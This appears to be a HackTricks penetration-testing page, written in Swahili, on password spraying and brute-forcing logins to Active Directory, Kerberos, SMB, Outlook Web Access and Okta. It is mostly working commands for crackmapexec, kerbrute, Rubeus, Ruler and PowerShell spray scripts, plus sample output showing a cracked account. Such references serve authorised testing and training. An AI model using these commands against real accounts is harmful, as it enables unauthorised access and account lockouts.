HackTricksPassword Spraying / Brute Force
Reading time: 5 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Password Spraying
Mara tu unapopata majina halali ya watumiaji kadhaa unaweza kujaribu nenosiri za kawaida zaidi (zingatia sera ya nenosiri ya mazingira) na kila mmoja wa watumiaji waliogunduliwa.
Kwa default urefu wa chini wa nenosiri ni 7.
Orodha za majina ya kawaida ya watumiaji zinaweza pia kuwa na manufaa: https://github.com/insidetrust/statistically-likely-usernames
Kumbuka kwamba unaweza kufunga baadhi ya akaunti ikiwa utajaribu nenosiri kadhaa zisizo sahihi (kwa default zaidi ya 10).
Pata sera ya nenosiri
Ikiwa una baadhi ya akidi za mtumiaji au shell kama mtumiaji wa kikoa unaweza pata sera ya nenosiri kwa:
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
enum4linux -u 'username' -p 'password' -P <IP>
rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo
ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
# From Windows
net accounts
(Get-DomainPolicy)."SystemAccess" #From powerview
Utekelezaji kutoka Linux (au yote)
- Kutumia crackmapexec:
crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
- Kutumia kerbrute (Go)
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
- spray (unaweza kuashiria idadi ya majaribio ili kuepuka kufungwa):
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
- Kutumia kerbrute (python) - HAIPENDIWI WAKATI MINGINE HAIFANYI KAZI
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
- Pamoja na moduli ya
scanner/smb/smb_loginya Metasploit:
.png)
- Kutumia rpcclient:
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done
Kutoka Windows
- Pamoja na Rubeus toleo lenye moduli ya brute:
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
- Kwa Invoke-DomainPasswordSpray (Inaweza kuunda watumiaji kutoka kwenye kikoa kwa default na itapata sera ya nywila kutoka kwenye kikoa na kupunguza majaribio kulingana na hiyo):
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
- Pamoja na Invoke-SprayEmptyPassword.ps1
Invoke-SprayEmptyPassword
Ukatili wa Nguvu
legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org
Outlook Web Access
Kuna zana nyingi za password spraying outlook.
- Na MSF Owa_login
- na MSF Owa_ews_login
- Na Ruler (inaaminika!)
- Na DomainPasswordSpray (Powershell)
- Na MailSniper (Powershell)
Ili kutumia yoyote ya zana hizi, unahitaji orodha ya watumiaji na nenosiri / orodha ndogo ya nenosiri za kutumia.
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020
Okta
- https://github.com/ustayready/CredKing/blob/master/credking.py
- https://github.com/Rhynorater/Okta-Password-Sprayer
- https://github.com/knavesec/CredMaster
References
- https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying
- https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell
- www.blackhillsinfosec.com/?p=5296
- https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.